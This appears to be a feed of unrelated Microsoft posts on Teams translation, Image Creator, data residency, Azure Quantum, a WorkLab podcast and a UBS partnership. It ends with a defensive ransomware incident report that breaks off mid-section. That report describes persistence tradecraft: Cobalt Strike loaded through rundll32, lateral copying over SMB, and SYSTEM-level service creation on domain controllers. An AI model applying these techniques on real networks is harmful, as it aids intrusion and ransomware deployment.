Making Teams for iOS & Android mobile devices the best tool for multi-lingual collaboration with intelligent chat message translation.
Effective collaboration and communication in a chat requires tools and features that understand who you are, where and how you like to communicate. Microsoft Teams on mobile devices can understand customers’ preferred languages and how customers like to interact with their contacts. When collaborators are chatting in different languages, the intelligent message translation feature uses their account preferences to inform the user when they would benefit from translation, and then personalizes chat translation behavior.
Microsoft Teams for iOS & Android mobile devices introduces intelligent message translation in chats. When a user receives a chat message in a language they don’t understand, Teams informs them with a prompt to translate the chat message into the user’s preferred language. The user can also personalize their chat translation behavior by turning on automatic translation.
How does it work?
When you receive a chat message in an unfamiliar language, Teams will prompt you with the option to translate it to your preferred language.
Tap Translate to translate the message.
Tap Never translate (language) if you don’t need translation for the language. Teams will stop showing you translations for that language and the language will be added to the Never translate list in Teams mobile. You can make edits to your language preferences in Teams by tapping your profile, select Settings, under General, select Translation. To remove a language from the Never translate list, delete it to undo the change.
The Help icon to the right of Never translate (language) allows you to provide feedback that will be used to improve language detection in Teams.
After using the translation feature a few times, Teams will prompt you with the option to turn on auto-translation to automatically translate messages to your preferred language.
This translation experience is available in the latest release of Microsoft Teams for iOS & Android mobile devices. By default, your translation language will be set to your Teams language.
If you want to change your default language:
Tap your profile picture in Teams.
Tap Settings. under General, select Translation. From there, you can customize your translation settings.
Teams supports translation to and from more than 100 languages.
Manage all your Teams mobile translation preferences in your profile Settings, under General, select Translation.
Last week, we announced our new creator tools in Microsoft 365, Bing, and Edge, designed to help ignite people’s imaginations and express themselves. Today, one of those tools, Image Creator from Microsoft Bing, begins rolling out in a limited preview to select markets and will be coming later this month to Microsoft Edge to those same markets. Image Creator allows you to create an image that doesn’t exist, limited only by your imagination. Simply type in a description of something, any additional context like location or activity, and an art style, and Image Creator will make it for you.
[embedded content]
Users have always been able to search Bing Images for an image that exists on the web, but with Image Creator they’re now able to create the images they want to see. Within Edge, users can use Image Creator in their sidebar. They’re able to create an image to share a life update with their friends online and drag and drop it within their main working page, all without losing focus on their workflow.
[embedded content]
Today, we’d like to share a bit more detail about how Image Creator works and what steps we’re taking to ensure it remains fun and inclusive.
We’ve found that generally, Image Creator works best when you type in a description of something, with additional context like location or the art style you’d like to emulate, as opposed to a more limited description. See below how Image Creator brings “dog astronaut launching into space, digital art” to life, for example, and how that contrasts with “crochet goldfish pencil drawing.”
You’re really only limited by your imagination here, so please try your own prompt, and see what the tool creates. Given that imagination is as much an art as a science, Image Creator will yield four options to choose from, that best represent what you’re looking for.
As we said last week at announce, it’s important with early technologies like Image Creator – which is powered by AI technology DALL∙E 2 by OpenAI – to acknowledge that this is new and that we expect it to continue to evolve and improve. We take our commitment to responsible AI seriously. To help prevent the delivery of inappropriate results across the Designer app and Image Creator, we are working together with our partner OpenAI, who developed DALL∙E 2, to take the necessary steps and will continue to evolve our approach. We will regularly take the feedback we have and share that with OpenAI to improve the model as well as applying to our own mitigations work.
For example, OpenAI removed explicit sexual and violent content from the dataset used to train the model. We’ve also adopted a range of mitigations, such as leveraging Microsoft Bing insights on problematic queries, as well as using blocklists and classifiers powered by Azure cognitive services that lower the risk of offensive prompts being issued. These and other mitigation efforts will continually evolve over time to ensure we’re up to date with new angles of potential abuse.
Microsoft has applied additional technology to address biases sometimes found in generative image technology. While some prompts may still surface biases, this is an area we are working to continuously improve. While we’re excited to see people use Image Creator to express themselves, we also want to make sure the content created using Image Creator does not impose harm to others. This Content Policy outlines the prohibited use cases of Image Creator; if you suspect any use of Image Creator in violation of this policy, you can report it here.
We hope the steps we’re taking, and guidance above help you get the most out of the Image Creator tool and keep it fun and inclusive. We welcome your feedback and look forward to what you will create!
In this episode of “Digital Now,” Scott Guthrie, executive vice president, Cloud + AI Group, Microsoft, explains how the company convinced customers to bet on the cloud.
In the early days of Azure, Guthrie says, Microsoft became a strategic partner to our customers, rather than just a vendor, a relationship that encouraged organizations to move mission-critical workloads to the cloud. Now, he says, Azure is running in hospitals, manufacturing facilities, governments, legislatures – even in space and underseas.
“Digital Now” is a video series hosted by Andrew Wilson, chief digital officer at Microsoft, who invites friends and industry leaders inside and outside of Microsoft to share how they are tackling digital and business transformation, and explores themes like the future of work, security, artificial intelligence, and the democratization of code and data.
Also in this episode, Guthrie and Wilson discuss how companies on a cloud journey can move beyond migrating existing workloads to achieving elasticity, how the cost savings of managed services often result in a greater investment in innovation, and why our customers’ IT teams are attaining hero status.
From cozy to creepy, we pumpkin-rank some of our favorite Game Pass games to play this Halloween.
If you’ve been looking for something to sink your fangs into this Halloween, have we got a treat for you! We’ve pumpkin-ranked the following Game Pass games from fall-themed cozy gems you can snuggle up with as the weather changes, to some real creepers that will give a proper scare — pick and choose to celebrate the season however suits you! Now, go have a happy Halloween with Game Pass!
Rediscover Halloween in this imaginative RPG from Tim Schafer’s Double Fine Productions. Explore the monster-filled neighborhood of Auburn Pines, Autumn Haven Mall, and Fall Valley Carnival. Collect magical costumes with superpowers, unique weapons, and special items as you hunt down quests. Level-up your heroic warrior and battle the evil overlords in this epic adventure to save Halloween!
Betray your friends — and lie your way to victory. In the multiplayer social deduction game Eville you find yourself in a village riddled by a series of murders. Some say it might have been you … or was it? Convince others you’re not a murderer to stay alive!
Descend into the world of Hollow Knight! The award-winning action adventure of insects and heroes. Explore twisting caverns, ancient cities, and deadly wastes. Battle tainted creatures and befriend bizarre bugs. Uncover ancient history and solve the mysteries buried at the kingdom’s heart.
Reaping souls of the dead and punching a clock might get monotonous but it’s honest work for a crow. The job gets lively when your assigned soul is stolen and you must track down a desperate thief to a realm untouched by death, where creatures grow far past their expiry date and overflow with greed and power.
A group of kids are trying to break into their suspicious neighbor’s basement to rescue their missing friend. Only problem is that one of the kids is a traitor — a Secret Neighbor in disguise. His job is to gain the trust of other players and betray them; kids win if they get into the basement.
Under grim moonlight, the fierce clayborne warrior Grey Irma battles, driven by a lonesome purpose: Find the Sculptor, and unravel the mystery of her existence. Push the limits of your combat skills and master new abilities to progress through an unforgiving nonlinear 2D world and face off against the relentless darkness that seeks to destroy you.
Part human, part demon, and obsessed with vengeance. Become The Unknown, and fight through the fiercest domains of Hell. Destroy the demon hordes and their leaders to set yourself up for an epic showdown with The Red Judge herself. Every legend has a song. And yours is one of metal, vengeance, and destruction.
In this direct sequel to A Plague Tale: Innocence, embark on a heartrending journey into a brutal, breathtaking world, and discover the cost of saving those you love in a desperate struggle for survival. Strike from the shadows or unleash hell with a variety of weapons, tools, and unearthly powers.
A thrilling cooperative first-person shooter from the creators of the critically acclaimed Left 4 Dead franchise. You’re at the center of a war against the Ridden. These once-human hosts of a deadly parasite have turned into terrifying creatures bent on devouring what remains of civilization. With humanity’s extinction on the line, it’s up to you and your friends to take the fight to the enemy, eradicate the Ridden, and reclaim the world.
Choose between playing as an unstoppable killer or one of four survivors trying to evade a gruesome death. Each character has their own deep progression system and plenty of unlockables that can be customized to fit your personal strategy. Work together to escape, or stalk and sacrifice every survivor.
Set in a nightmarish universe of odd forms and somber tapestry. Isolated and lost inside this dream-like world, you will explore different interconnected regions in a non-linear fashion. Every location contains its own theme, puzzles, and characters that are integral in creating a cohesive world.
Commercial and public sector organizations continue to look for new ways to advance their goals, improve efficiencies, and create positive employee experiences. The rise of the digital workforce and the current economic environment compels organizations to utilize public cloud applications to benefit from efficiency and cost reduction. However, organizations are rightfully concerned about data residency, privacy, and security, as evidenced by the myriad of privacy regimes, national security laws, and data residency requirements being erected by national and regional authorities. From a 2017 baseline of 67 laws and regulations in 35 countries, worldwide data residency measures have more than doubled to 144, spread across 62 countries.1
Microsoft is a leader in helping organizations of all types throughout the world address their data residency, privacy, and security requirements. Microsoft has the most comprehensive compliance coverage of any cloud service provider with 100-plus offerings including more than 50 which are specific to global regions and countries.
Beginning in 2014 with our initial local datacenter region in Japan to our recent launch in Qatar, Microsoft 365 now has local datacenter regions in 15 countries worldwide with announced plans to launch 13 additional local datacenter regions over the coming years.2 This unrivaled fleet of datacenter regions provides Microsoft 365 customers with global coverage coupled with local choice for customer data residency.
For commercial and public sector customers, we provide the leading data residency commitment in the productivity and collaboration space, storing customer data at rest in any of our multiple macro-regions or local datacenter regions to suit customer requirements. Until now, this unparalleled data residency commitment covered customer content in the core Microsoft 365 workloads of Exchange Online, OneDrive for Business, and SharePoint Online.
Microsoft 365 has a heritage in providing sophisticated customer data residency solutions, like Multi-Geo Capabilities for multi-national companies that require more granular data location controls. In 2021, Microsoft also announced expanded commitments to create an EU Data Boundary for the Microsoft Cloud.3 With this commitment, Microsoft pledged to process and store commercial and public sector European Union customer data within the European Union. This commitment will apply across all of Microsoft’s core cloud services including Microsoft Azure, Dynamics 365, and Microsoft 365.
But we aren’t stopping there. In this new age of hybrid work and the increasing reliance on digital transformation, our customers are demanding additional controls for data, including where it resides and its treatment.
Microsoft Teams and data residency
With over 270 million monthly active Microsoft Teams users, customers have turned to Teams as an indispensable tool to communicate, collaborate, and stay in the flow of hybrid work. Microsoft is now adding Teams to the customer data residency commitments in our Product Terms, covering commercial and public sector customers in the existing 15 local datacenter regions. With this extension to our existing promises, Teams core customer data, consisting of Teams chat messages (including private messages, channel messages, meeting messages, and associated images), and meeting recordings,4 present in the tenant, will be stored at rest in local datacenter regions.
Microsoft 365 Advanced Data Residency add-on
We are also announcing the new Microsoft 365 Advanced Data Residency add-on that will extend the commitments for customer data storage at rest. With availability beginning in November 2022, the Advanced Data Residency add-on is designed to give regulated commercial and public sector customers of Microsoft 365 additional assurances that may help with their compliance with data residency laws, regulations, and industry standards. It will provide eligible customers with premium services, including data storage at rest commitments for expanded workloads including Exchange Online Protection, Microsoft Defender for Office Plan 1, Office for the Web, Microsoft Viva Connections, Microsoft Viva Topics, and components of the Microsoft Purview suite. Additionally, the add-on provides customers eligible to migrate their Microsoft 365 tenants into our local datacenter regions with prioritized migration benefits.
Looking ahead
We’re committed to building on the value and services available for Microsoft 365 customers with the Advanced Data Residency add-on and other data residency offerings. Microsoft continues to invest in data residency, privacy, and security advancements that allow our customers to have peace of mind in the ever-evolving regulatory landscape. Through the expansion of our local datacenter regions, advancements in data residency offerings across the Microsoft 365 portfolio, and connection to the Microsoft cloud, we are excited to continue helping customers across the world accelerate their digital transformation.
Since it was introduced in February, the Azure Quantum Credits program has attracted applicants ranging from enterprise innovators and solution partners to academic researchers and student explorers. It has been exciting to see the diversity of proposals submitted – featuring the use of quantum hardware accessible through Azure Quantum to investigate novel use cases, experiment with state-of-the-art algorithms, and pursue applications in industries like chemistry and materials sciences.
From New York to Tennessee, Hyderabad to Verona, and Finland to Canada—we’re delighted to be the quantum platform of choice for research in areas as diverse as molecular energy estimation, quantum computer crosstalk, protein folding dynamics, quantum machine learning for price prediction, and quantum detection of cardiovascular events in cardiac signals.
We are pleased to showcase the creativity and energy of three of our credit recipients—the University of Washington, Bar-Ilan University, and KPMG in collaboration with the Danish Technical University (DTU)—who leveraged IonQ and or Quantinuum hardware through the Credits program.
Watch the video below to see these projects in action
The benefits of getting hands-on with quantum hardware in a classroom setting are clear. As Kai-Mei Fu, Professor of Physics at the University of Washington, described, “Our students had never accessed hardware. Many people think that you can just do everything on a simulator. It turns out, there are some surprising results that happen when you use a real quantum computer that are very important. It’s extremely valuable to be on real machines through Azure Quantum.”
Professor Emanuele Dalla Torre, of Bar-Ilan University’s Department of Physics, added “Azure Quantum allows you to connect to different quantum computers. Through this, we were able to see that what we had imagined in our theoretical analysis was happening in the real world on a quantum computer. Our experiment with Azure Quantum gave us a hint of what the possible near-term applications of quantum computing are.“
In a public-private research endeavor, solution partner KPMG collaborated with DTU on neural networks-focused research using Azure Quantum Credits.
Bent Dalager, Partner and Global Head of KPMG’s Quantum Hub, noted, “Azure Quantum democratized the ability to use quantum computing. Instead of having to rely on a specific piece of hardware, through a language layer, you can pursue quantum computing through Azure Quantum in a tremendously more efficient way.”
In the last six months, the Azure Quantum Credits program has expanded from its initial offering of IonQ Harmony and Quantinuum H1 quantum processing units (QPUs). The associated simulator and emulator also now offer experimentation on IonQ Aria’s 23 algorithmic qubit system, Quantinuum H2, and Rigetti’s 40 qubit Aspen-11 and latest 80 qubit modular chip Aspen-M-1 endpoints.
Coming soon, Pasqal’s neutral atom-based quantum technology will be available in the Azure Quantum Credits program, allowing innovators and explorers to harness Pasqal’s impressive qubit connectivity and the ability to directly manipulate neutral atoms.
The enthusiasm we’ve enjoyed during our weekly office hours about Azure Quantum Credits has been palpable and we’ve appreciated the benefit of community feedback in continuously improving the Credits program. For quantum educators, the Azure Quantum Credits program is a cornerstone of our one-stop resource for curriculum, samples, and tools to facilitate the skilling up of a quantum-ready workforce.
TONYA MOSLEY: That’s our guest, Sarah Bond, corporate vice president of Xbox at Microsoft. This week she talks to us about games, or more specifically, what games have to teach us about the future of work. Today, 3 billion people on the planet play games, which have a unique and powerful ability to enable collaboration, break barriers, build rapport, spark imagination, and create empathy. Gaming allows strangers to come together and work as a team to achieve a goal, even if they don’t speak the same language, have never met, live in a different part of the world, or have different abilities. As companies explore new ways to enable teamwork, including forays into the metaverse, they can learn a lot about how to best proceed from games. Sarah is the perfect person to walk us through that. Now here’s our conversation.
TONYA MOSLEY: Hi, Sarah.
SARAH BOND: Hi.
TONYA MOSLEY: Three billion people play games right now. I mean, there is so much community building that happens within gaming. We were talking about and thinking about what gaming can teach us about the future of work. And I know that you’ve been thinking a lot about that as well.
SARAH BOND: There used to be a time in gaming where the device was the center of the experience for the user. It would be about the console you bought, the PC that you configured. That paradigm was built on a set of technical limitations that existed from when gaming really started to take off as an industry. A lot of those limitations actually don’t exist anymore, and we’re just sort of carrying forward that paradigm. People really want to be able to play the games they want with the people that they want where they want. I think the same is really true for how people want to work, right? It used to be that you had to come into the office to collaborate with people. The tools, the technology, the services just weren’t there to replicate the experience. I think that there’s so much about how we’re seeing work change, the idea that you can collaborate at any time in any space synchronously, but also asynchronously, using the tools we create. That’s very similar to what we’re seeing happen in gaming.
TONYA MOSLEY: How did you come into this job? Can you share with us a little bit about your career journey and what led you to this role?
SARAH BOND: Well, you know, I always played games growing up, it was a big part of my upbringing. My dad and I, the first game I can remember playing with him was King’s Quest II when I was six or seven years old. And, after college, I pursued a career up through the business side, but really focused on consumer tech. I worked at McKinsey, I went to business school, and then I spent a good amount of time working at T-Mobile. I started as the chief of staff there, and then I led strategy, and then I ran business development. Then I got to a point where I was running a few businesses. Then at that point, I got the opportunity to come to Microsoft. And after I’d been at Microsoft for a few months, the role leading business development for gaming came open, and it just really clicked for me to take that role, especially considering how much work I had done in consumer tech throughout my career, and also that I had grown up playing games. And I led that team for about two years and it was a fantastic experience. And after about two years in that role, we were looking at the opportunity and we realized that it was really important that we talk to game developers and creators, as Microsoft, in a way that was really tailored to their needs, and that based off of everything we knew at Xbox, it was important to center that in Xbox. So in addition to all of the responsibilities I had leading the commercial relationships with game developers, I also got responsibility for all of the technical tools and services that we build to meet their needs.
TONYA MOSLEY: Microsoft has been thinking very deeply as well about the metaverse, something that we’ve been talking about over the last few years as a place to live and work, essentially. I mean, an example of this is creating digital offices to connect with colleagues, as you say, who are all around the world. What are you most excited about in this space?
SARAH BOND: Well, what I’m most excited about is when people talk about a metaverse experience. They’re talking about a digital world that’s immersive, that can hold millions of people simultaneously who have individual identities and wallets and histories. And I look at all of that and I realize that, as Microsoft, we have all those capabilities because we know how to build a game, and all of those things exist in a game. That’s what Forza is, that’s what Halo is, that’s what Minecraft is. And so I’m really excited because we are in such a beautifully unique position to take the things that we’ve learned in the gaming industry about how to do that, and how to do that in a way that’s secure, that respects privacy, that has parental controls, and real thought and care in how it’s executed and infused in it because we’ve already learned all of those things as part of the gaming industry.
TONYA MOSLEY: Right. I mean, and building that connectivity—one interesting phenomenon, as you mention, is how online multiplayer games encourage collaboration between two people who have never met each other in person. We see that with Minecraft and other games like that, but also folks who don’t speak the same language. So many industries are navigating ways, as you said, to improve remote work specifically. What can business leaders take away from the success of collaboration in gaming?
SARAH BOND: It really is the only media forum where you can do something with someone and accomplish something in coordination with them. You may have never met them, you don’t necessarily speak the same language, you don’t even know what they look like. That’s very powerful and I think important in today’s society, where the breadth of the different cultures and experiences that we encounter is wider and more varied, and in some ways more difficult to process because of that than it ever has been before in human history. And so when I think about that in business, so much of what we’re doing and the things that we invest in are to enable that exact same experience, to take down barriers like time zone, and to auto-translate that makes people well understood. It allows so many more perspectives and also new opportunities for collaboration across distances and across a range of capabilities that before wasn’t possible.
TONYA MOSLEY: You believe games can foster empathy…
SARAH BOND: I do. You know, I think empathy comes from not just understanding the position that someone else is in, but feeling an emotion about it and being compelled to act on that emotion. And when you’re playing a game, you have to go through that whole cycle. You have to understand the situation, and then you make a choice. And so very uniquely, when you’re playing a game, either it’s because you’re collaborating with someone who you may otherwise not have met, or if it’s because you’re experiencing a story from a perspective that’s unique to you, there’s a level of empathy and shared understanding that can come from a gaming experience that is quite beautiful.
TONYA MOSLEY: You know, many non-gaming businesses are focused on how to shift the ways its employees interact with technology, specifically building up the metaverse. What do you think the games industry can teach us about how to construct and engage in virtual worlds that people truly want to explore and collaborate within?
SARAH BOND: So much. I mean, look, it’s not just about creating an avatar and putting it in a virtual world. It’s about there being a reason for being there—a why—that’s what games give you. They give you a motivation, something that you could accomplish. And it’s also about doing it in a way where people believe that they can express themselves in a way that’s safe and inclusive. And that core thing, I mean, often in gaming we talk about the mechanics of a game, but that’s really talking about that core motivational loop and how you make that one that’s motivating and delightful and that people can be included in. And I think that’s the key thing. That is what makes games special.
TONYA MOSLEY: I’ve heard you say that fostering relationships with the people who develop games for Microsoft platforms is a major priority. And I’m sure you’ve learned a lot over the years as you’ve cultivated those game creator relationships. I’m thinking about what lessons other industries can learn as well from building those relationships as they think about a metaverse that allows its employees to interact with technology and deepen their connectivity and their working relationships with each other.
SARAH BOND: In the end, all of life is the interactions you have with each other. As much as I think people like to talk about business being about optimizing a set of dollars and cents, the real value comes from the people who make the choices, build the visions, and drive the execution. In the case of game creators, we take it very seriously that we push the boundaries of making it possible for us to have a relationship, for it to be possible for any creator to bring their game to Xbox. And I want the people to build those experiences to represent all of the people in the world, not just people who are like me or have the same views. So building those relationships, but really extending them and making it possible for anyone who wishes to create a game and bring their story to the fore through that medium is important, you know, to run a good business. But it’s also important when we think about the impact that gaming can have on society.
TONYA MOSLEY: You know, to this point, we have been online and in virtual spaces long enough to also know that they can be toxic. There can be negative aspects of it. What can the game industry also teach metaverse builders about encouraging positive interactions?
SARAH BOND: We’ve spent so much time on this. It’s so important to us. We have the phrase, ‘when everyone plays, we all win.’ And that doesn’t just mean that someone can actually play, it means that you can enjoy it—that you go away feeling positive and wanting to go back. And we see consistently that if somebody has a toxic or negative experience on our platform, they don’t want to go back. It doesn’t matter. All the other stuff goes away if you went to have a fun time and you come away hurt. And so we do a lot of investment in creating the tools in the community that creates a positive gaming experience for people. We do it in our policies; we’re super clear about our code of conduct and how we want individuals to behave. We do it in the investments that we do in tech to monitor what’s going on in parental controls and settings that you can set so that you can go into spaces and feel comfortable. And we also do it in the community itself. I mean, one of the most beautiful things about the Xbox community is that we’re so clear about our intent. We’re so clear about what we want individuals to experience that when that doesn’t happen, the community will actually help self-regulate, will let us know when something is going on to ensure that we actually build on that experience and are able to deliver it. And I think it’s all of those things, continually iterating and investing in them and taking it very seriously, that’s important for us to bring to metaverses as they start scaling around the world.
TONYA MOSLEY: You believe that playing games can stimulate the brain and encourage a growth mindset, which is from the influential book by Carol Dweck.
SARAH BOND: When you think about what Carol Dweck is really saying in her book, it’s the idea that if you put in effort, it will lead to a different result. It turns out a game perfectly embodies this idea, like if you start out playing a game—this is my experience frequently—I have no idea what to do. Like, I get in my character, I do a couple of things, I die, or I get frustrated, or I can’t figure out a puzzle and the level seems impossible. But then I come back and I try again and again and again. And in the end, by the time you have invested that time in it and you’ve learned how it works and you’ve figured out the mechanics, a level that before would have seemed impossible or a series of jumps that you couldn’t have imagined being able to do, you can breeze right through. And the consequence of failing is, relative to some consequences in life when you try something risky, pretty low, right? You might lose some coins or something, but you’ll come back. And so I love the fact that gaming, just by its very nature, teaches you that if you keep working at it, something that seems impossible, you can master. And I’ve really appreciated seeing that in my kids. My littlest loves to play games. He actually regularly plays with my dad, which I think is adorable. I mean, my dad is in his mid 70s, my son is 8, and they will sit side-by-side and do this thing together. But he’s learning that, you know, because he’s little, that failure isn’t failure, that if you get something wrong or you mess up that it doesn’t define you. And he’ll have a reaction, he’ll be like, ‘Oh, but I messed up,’ and he’s crying and everything. I’m like, ‘Well, no, get back up and try again.’ And he’s like, ‘I can?’ And so I see him learning and growing through the experience of a game, and therefore being more willing to take risks or try new things in real life because he’s already built that confidence that applying himself can lead to a different result.
TONYA MOSLEY: Yes, I’ve actually seen this as well firsthand with my 9-year-old who builds worlds with his friends and cousins within Minecraft. Which makes me wonder about what skills do you see forming for these kids who have grown up creating these virtual worlds or grown up gaming and building on this idea of a growth mindset?
SARAH BOND: Well, you know, when I was a girl, I had two phone numbers memorized, I think three, actually. I had my own phone number memorized, I had my first best friend’s phone number, and my second best friend’s phone number. And I would probably call them in about that order. And the idea of maintaining a friendship when I moved away that didn’t involve seeing someone in person every day was completely foreign and impossible. So I think the number one thing, honestly, that kids are learning from gaming is the definition of a relationship and what it means and how you can engage with someone—[this] transcends being in person. And I really see my daughter, my son, you know, their ability to connect with and identify with people over many, many mediums is very, very different than I think our generation that just didn’t grow up building bonds in that way.
TONYA MOSLEY:You know, the forms of collaboration and games can be very ambitious and intricate and require extraordinary levels of collaboration. What can leaders and people managers learn from looking at multiplayer games specifically, like esports, for instance?
SARAH BOND: Let’s give Overwatch as an example. Overwatch has different types of characters that you can play. It’s a team game, so you play as a team, but you pick a different type of character and the characters have different abilities. There’s some that have healing abilities or some that are really fast, you know, they have different weaponry that are associated with them. And when people first started playing Overwatch, they didn’t realize how much this mattered. But it turns out that a team has a better chance of winning if you have the right variety of characters adopted. Now, the game is built that way, that’s how they built it. They didn’t have to build it that way, but I appreciate they built it that way because that is a wonderful lesson for all of us as leaders—because that’s actually how the real world works.
TONYA MOSLEY: Sounds like I’ve got to start playing more games.
SARAH BOND: You never know what you might find out.
TONYA MOSLEY: Sarah Bond, thank you so much for this conversation.
SARAH BOND: Thank you. It was wonderful to connect. Thank you for having me.
TONYA MOSLEY: Thanks again to Sarah Bond, corporate vice president of Xbox at Microsoft. And that’s it for this episode of the WorkLab podcast from Microsoft. Please subscribe and check back for the next episode of WorkLab, where I’ll be speaking with Versha Sharma, editor in chief of Teen Vogue, about the wants and needs of Gen Z employees entering the workforce. And please rate us, review, and follow us wherever you listen. It really helps us out. And if you’ve got a question, we’d love to hear from you. You can drop us an email at worklab@microsoft.com. And check out the WorkLab digital publication too, where you can find the latest Work Trend Index report, as well as a transcript of this episode. You can find everything at Microsoft.com/WorkLab. WorkLab is produced by Microsoft and Godfrey Dadich Partners and Reasonable Volume. I’m your host, Tonya Mosley. Our correspondents are Mary Melton and Desmond Dickerson. Sharon Kallander and Matthew Duncan produced this podcast. And Jessica Voelker is the WorkLab editor. Thank you for listening.
UBS plans to have more than 50% of its applications running in the Microsoft Azure cloud
Initiative will help UBS provide innovative products and services to clients, further empower employees and advance sustainability goals
UBS and Microsoft co-develop products and solutions to meet the digital needs of the bank and financial services industry
ZURICH and REDMOND, Wash. — Oct. 20, 2022 — On Thursday, UBS and Microsoft Corp. announced a landmark expansion of their partnership to accelerate UBS’s public cloud footprint over the next five years. Through this transformational initiative, UBS plans to have more than 50% of its applications, including critical workloads, running on Microsoft Azure, now UBS’s primary cloud platform. The partnership furthers UBS’s “cloud-first” strategy and the modernization of its global technology estate.
Through this partnership, UBS will have access to the most comprehensive cloud platform, trusted by more than 95% of Fortune 500 companies, with a rich set of productivity and collaboration tools, enabling the firm to increase the speed at which it can deliver and improve upon its digital experiences for clients and employees. At the same time, Azure will help advance UBS’s sustainability initiatives, drive operational efficiencies, and maintain its standards for compliance and security — providing strong foundations on which to scale UBS’s rate of cloud adoption.
“Our cloud strategy has fundamentally changed the way we operate, allowing us to reinvigorate our technology estate and reimagine how we build applications for our clients,” said Mike Dargan, UBS Group chief digital and information officer. “Closely partnering and collaborating with Microsoft has and will continue to create tremendous value for our clients, our employees, the firm and our shareholders. The developments and learnings that stem from this partnership will benefit the financial services industry and beyond.”
In 2018, when UBS announced its cloud strategy, leveraging its strategic partnership with Microsoft, it planned to move one-third of its applications to public cloud within four years, but accomplished this goal early in February 2021. Now, the partnership goes beyond just consuming cloud services to include the co-development of innovations and greater collaboration in areas like carbon reduction.
“UBS is a forward-thinking leader in the financial services industry, and Microsoft has been fortunate to co-develop innovative applications that meet complex, regulatory requirements with their engineering teams over the past several years,” said Scott Guthrie, executive vice president, Cloud + AI, Microsoft. “Our expanded partnership will continue to accelerate the organization’s ambitious digital transformation plans, applying the power of the Microsoft Cloud to equip UBS with the agility and reliability to deliver for their clients.”
Advancing digital sustainability
In line with the firm’s sustainability goals, UBS continues to move certain technology platform workloads from its on-premises and private cloud servers to Azure. In some use cases, this has resulted in the energy consumption of these workloads to be reduced by up to 30% to date.
Together, UBS and Microsoft also co-developed a Carbon Aware API, an open-source solution that provides recommendations on how to schedule workloads that require heavy compute power during times when clean, renewable or low-carbon sources of electricity are most available. They then provided their solution to the Green Software Foundation so it could be shared with large and small companies around the world.
Enhancing client and employee experiences with artificial intelligence
UBS and Microsoft are implementing and further exploring ways in which artificial intelligence and data can be used to enhance services for clients and employees. For example, in Switzerland, UBS is currently operating two applications that utilize conversational AI capabilities to respond to client e-mail inquiries.
Unleashing innovation and driving greater business insights on a trusted platform
To support UBS’s “cloud-first” strategy and further drive innovation, Microsoft actively brought its Azure confidential computing services to Switzerland. This provided UBS with a new functionality to protect and secure data sharing internally across all of UBS’s business divisions, while maintaining the bank’s compliance and security standards. As a result, UBS can now develop additional business insights and uncover new opportunities for innovation for its clients and employees.
In addition, UBS will leverage Microsoft Power Platform — including Power Apps and Power Automate — which will provide employees with the ability to quickly build professional-grade applications, create automated workflows and connect disparate data sources.
About UBS
UBS convenes the global ecosystem for investing, where people and ideas are connected and opportunities brought to life, and provides financial advice and solutions to wealthy, institutional and corporate clients worldwide, as well as to private clients in Switzerland. UBS offers investment solutions, products and impactful thought leadership, is the leading global wealth manager, provides large-scale and diversified asset management, focused investment banking capabilities, and personal and corporate banking services in Switzerland. The firm focuses on businesses that have a strong competitive position in their target markets, are capital efficient and have an attractive long-term structural growth or profitability outlook.
UBS is present in all major financial centers worldwide. It has offices in more than 50 regions and locations, with about 30% of its employees working in the Americas, 30% in Switzerland, 19% in the rest of Europe, the Middle East and Africa and 21% in Asia Pacific. UBS Group AG employs more than 72,000 people around the world. Its shares are listed on the SIX Swiss Exchange and the New York Stock Exchange (NYSE).
About Microsoft
Microsoft (Nasdaq “MSFT” @microsoft) enables digital transformation for the era of an intelligent cloud and an intelligent edge. Its mission is to empower every person and every organization on the planet to achieve more.
For more information, press only:
Microsoft Media Relations, WE Communications for Microsoft, (425) 638- 7777, rapidres[email protected]
Note to editors: For more information, news and perspectives from Microsoft, please visit the Microsoft News Center at http://news.microsoft.com. Web links, telephone numbers and titles were correct at time of publication but may have changed. For additional assistance, journalists and analysts may contact Microsoft’s Rapid Response Team or other appropriate contacts listed at https://news.microsoft.com/microsoft-public-relations-contacts.
Ransomware is one of the most pervasive threats that Microsoft Detection and Response Team (DART) responds to today. The groups behind these attacks continue to add sophistication to their tactics, techniques, and procedures (TTPs) as most network security postures increase.
In this blog, we detail a recent ransomware incident in which the attacker used a collection of commodity tools and techniques, such as using living-off-the-land binaries, to launch their malicious code. Cobalt Strike was used for persistence on the network with NT AUTHORITY/SYSTEM (local SYSTEM) privileges to maintain access to the network after password resets of compromised accounts.
This incident highlights an attacker’s ability to have a longstanding dwell time on a network before deploying ransomware. We will also discuss the various techniques used as well as the recommended detections and defense techniques that customers can use to increase protection against these types of attacks.
Microsoft recommends hunting proactively for pre-ransomware behaviors and hardening your network to prevent impact. Refer to https://aka.ms/ransomware-as-a-service for more information about defending against ransomware-related incidents.
What we found
Figure 1. Overall timeline of activities of the ransomware incident
Initial access
DART was unable to determine the initial entry vector of this attack due to the age of this compromise and limited retention of security solutions, along with encrypted devices being reimaged before analysis. The earliest observed activity showed the actor with domain administrator credentials.
Persistence
In DART’s post ransomware investigation of this engagement, the team found multiple instances of scheduled tasks and services being created by the attack for persistence after they had gained access to highly privileged credentials. Services and Scheduled Tasks have the option to run as NT AUTHORITY\System, allowing their malicious code to run with highly privileged access. Because the actor created those tasks and services on a domain controller, the Local SYSTEM access allowed them to easily access domain administrator accounts. The deployment of a backdoor to a domain controller can help an actor bypass common incident response recovery activity, such as resetting compromised accounts, in the hope of staying resident on the network.
Service: Cobalt Strike
Cobalt Strike was seen on a large scale across the network, on domain controllers, servers, and administrator workstations. The actor created Windows services to persist their payload executing rundll32 to load the Cobalt Strike DLL through invoking the “AllocConsole” exported function of a variation of the Termite family of malware. These services were observed to execute with a combination of SYSTEM and domain administrator credentials. Termite malware is often used by crimeware groups to load Cobalt Strike while bypassing antivirus detections. Further information on the Termite malware family can be found in this blog: (Ex)Change of Pace: UNC2596 Observed Leveraging Vulnerabilities to Deploy Cuba Ransomware.
Figure 2. Example of the actor executing Cobalt Strike through rundll32.exe with system integrity
The Cobalt Strike DLLs were in C:\Windows\Temp and used a naming scheme based on the first and local octet of the command and control (C2). Once the actor installed Cobalt Strike on a domain controller, the malware was spread using a PowerShell script, which copied the DLL to C:\Windows\Temp via SMB, and then executed it through remote service creation.
Figure 3. Example of the threat actor copying Cobalt Strike through SMB
The actor elevated their permissions to “NT AUTHORITY\System” through service creation. This service creation was likely done through Cobalt Strike, using a pseudorandom service name, such as “4aedb00”.
Scheduled task: OpenSSH
